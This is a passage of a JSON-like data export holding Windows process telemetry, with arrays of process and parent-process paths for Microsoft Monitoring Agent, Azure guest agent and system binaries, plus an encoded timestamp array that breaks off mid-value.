Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\"],\"TimeGenerated\":{\"__ndarray__\":\"AKA0fP+EdkIAcDV8/4R2QgDwpHz/hHZCAKCxfP+EdkIAMKuD/oR2QgDQ1JH+hHZCAODVkf6EdkIAUD+S/oR2QgBwUZL+hHZCAKD3oP6EdkIAACCv/oR2QgDwIq/+hHZCAFCHr/6EdkIAAJ2v/oR2QgAAnEH/hHZCABCdQf+EdkIAkO9B/4R2QgAQGkL/hHZCADC/UP+EdkIAACcW/4R2QgCgUCT/hHZCALBRJP+EdkIA8Kck/4R2QgCgzST/hHZCAABzM/+EdkIAALNe/YR2QgDQ3Gz9hHZCAODdbP2EdkIA8Eht/YR2QgAQWm39hHZCAACD6fyEdkIA0Kz3/IR2QgCwrff8hHZCABAD+PyEdkIAACn4/IR2QgBwN8z8hHZCAABg2vyEdkIAQGHa/IR2QgDQutr8hHZCABDe2vyEdkIAAD+n+4R2QgAwaLX7hHZCAEBptfuEdkIAIMW1+4R2QgCg5bX7hHZCAHCP2/6EdkIAMLjp/oR2QgBwuen+hHZCANAW6v6EdkIA0DXq/oR2QgCQPvP+hHZCAHBA8/6EdkIAcF/z/oR2QgDgX/P+hHZCAKBy8/6EdkIAsJvz/oR2QgCQxvP+hHZCABAm9f6EdkIAkGWs/IR2QgDAfaz8hHZCAKDrrvyEdkIAoBS9/IR2QgCwFb38hHZCANByvfyEdkIAAJG9/IR2QgCg/3v9hHZCAAAoiv2EdkIAECmK/YR2QgDQkYr9hHZCAKCliv2EdkIAMJ+R/IR2QgDwMpP8hHZCAPCK9/6EdkIA0Nv4/oR2QgBQCfb+hHZCAKAL9v6EdkIAAF9m/oR2QgA